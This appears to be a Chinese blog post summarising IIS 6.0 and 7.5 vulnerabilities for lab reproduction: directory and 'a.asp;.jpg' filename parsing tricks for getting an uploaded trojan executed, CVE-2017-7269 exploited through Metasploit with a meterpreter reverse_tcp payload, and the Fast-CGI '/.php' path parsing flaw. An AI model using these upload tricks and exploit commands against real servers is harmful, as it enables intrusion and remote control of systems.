IIS 漏洞总结

 

 

目录

IIS介绍

IIS6.0 版本

目录解析漏洞

文件名解析漏洞

远程代码执行漏洞  cve_2017_7269 

漏洞描述

POC 说明

漏洞利用

IIS7.5版本

IIS解析漏洞

漏洞原理

实验环境搭建

漏洞复现


IIS介绍

iis是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务

IIS6.0 版本

目录解析漏洞

对于名字为.asp后缀的文件夹,IIS会将该文件夹内部的文件都解析为.asp文件来执行。

即构造名字为a.asp的目录,目录中的1.txt会作为asp文件执行。

文件名解析漏洞

对于名字为'a.asp;.jpg'文件,IIS并非以最后一个后缀名来判断格式,故会将其解析为asp文件并执行。

即上传木马的后缀名为'.asp;.jpg'就可以被服务器执行。

远程代码执行漏洞  cve_2017_7269 

漏洞描述

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞的威胁,远程攻击者通过以“if:<http://"开头的长header PROPFIND请求,执行任意代码。

POC 说明

  • cve_2017_7269 .rb
  • 此文件在我的资源中可以找到,或者私信我,我发给你!
  • 此处给出的该漏洞的exploit,用户需要结合Kali 中的Metasploit使用!放到kali路径为:/usr/share/metasploit-framework/modules/exploits/windows/iis/

漏洞利用

1.打开windows 2003 开启WebDAV

2.打开kali,将我们的poc文件放到指定位置,利用msf完成本次任务!

  • use expolit/windows/iis/cve_2017_7269
  • set payload windows/meterpreter/reverse_tcp
  • set rhost  192.168.31.130
  • run

3.由于我的windows server 2003 攻击过多,无法演示,以后会补上!

 

 

 

IIS7.5版本

IIS解析漏洞

漏洞原理

IIS7/7.5在Fast-CGI运行模式下,在某文件路径下(/x.jpg)后面加上’/.php’,则会以php文件格式解析该图片

 

实验环境搭建

 

漏洞复现

1.首先在网站根目录下有一个1.jpg图片,其内容为’<?php phpinfo(); ?>’,我们正常访问它 http://localhost/1.jpg

2.然后我们访问 http://localhost/1.jpg/.php ,可以看到以php文件格式解析该图片,执行phpinfo。

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值